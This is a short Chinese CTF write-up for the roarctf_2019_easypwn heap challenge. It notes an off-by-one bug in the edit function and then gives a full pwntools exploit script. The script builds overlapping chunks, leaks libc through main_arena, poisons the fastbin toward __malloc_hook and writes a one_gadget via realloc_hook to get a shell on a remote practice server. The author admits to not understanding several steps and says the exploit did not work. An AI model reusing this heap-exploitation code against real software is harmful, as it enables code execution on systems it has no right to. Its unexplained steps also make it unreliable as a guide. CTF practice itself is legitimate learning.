roarctf_2019_easypwn

保护全开

edit函数

若要编辑的大小大过申请的10，可以多输入一字节，存在off-by-one漏洞

这里不太懂为什么伪造的堆1 free不会报错

free(1)

add(0x90)

试用这种方法也能show出main_arena

至于为什么能show，也是挺奇怪的，因为在show函数那里限制了大小，取的是原来的大小

add(0x80)

奇怪，这里再申请0x80的大小，然后size还是0xa1

这里也不太懂为什么要这样写,后面的p64(0x70)+p64(0x21)

payload=p64(0)*3+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21)

不过最后的话，是打不通的。

exp

from pwn import *

r=remote('node5.buuoj.cn',28118)
#r=process('roarctf_2019_easy_pwn')
libc=ELF('./libc-2.23.so')
context.log_level="debug"

def add(size):
    r.recvuntil('choice: ')
    r.sendline('1')
    r.recvuntil('size:')
    r.sendline(str(size))

def edit(index,size,data):
    r.recvuntil('choice: ')
    r.sendline('2')
    r.recvuntil('index:')
    r.sendline(str(index))
    r.recvuntil('size:')
    r.sendline(str(size))
    r.recvuntil('content:')
    r.send(data)
 
def free(index):
    r.recvuntil('choice: ')
    r.sendline('3')
    r.recvuntil('index:')
    r.sendline(str(index))
 
def show(index):
    r.recvuntil('choice: ')
    r.sendline('4')
    r.recvuntil('index:')
    r.sendline(str(index))  

add(0x18)
add(0x10)
add(0x90)
add(0x10)

edit(0,0x22,b'b'*0x10+p64(0x20)+p8(0xa1))

edit(2,0x80,p64(0)*14+p64(0xa0)+p64(0x21))

free(1)
add(0x90)

edit(1,0x20,p64(0)*3+p64(0xa1))
free(2)
show(1)
r.recvuntil('content:')
r.recv(0x20)
main_arena=u64(r.recvuntil('\x7f').strip()[-6:].ljust(8,b'\x00'))-88
malloc_hook=main_arena-0x10
base=malloc_hook-libc.sym['__malloc_hook']
realloc_hook=base+libc.sym['__realloc_hook']
add(0x80)
print(hex(main_arena))
payload=p64(0)*3+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21)
edit(1,0x90,payload)
free(2)

payload=p64(0)*3+p64(0x71)+p64(malloc_hook-0x23)
edit(1,0x28,payload)
add(0x60) #2

add(0x60) #4

one=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=base+one[3]
edit(4,0x1b,b'a'*11+p64(one_gadget)+p64(realloc_hook+4))
#gdb.attach(r)
sleep(1)
add(0x10)

r.interactive()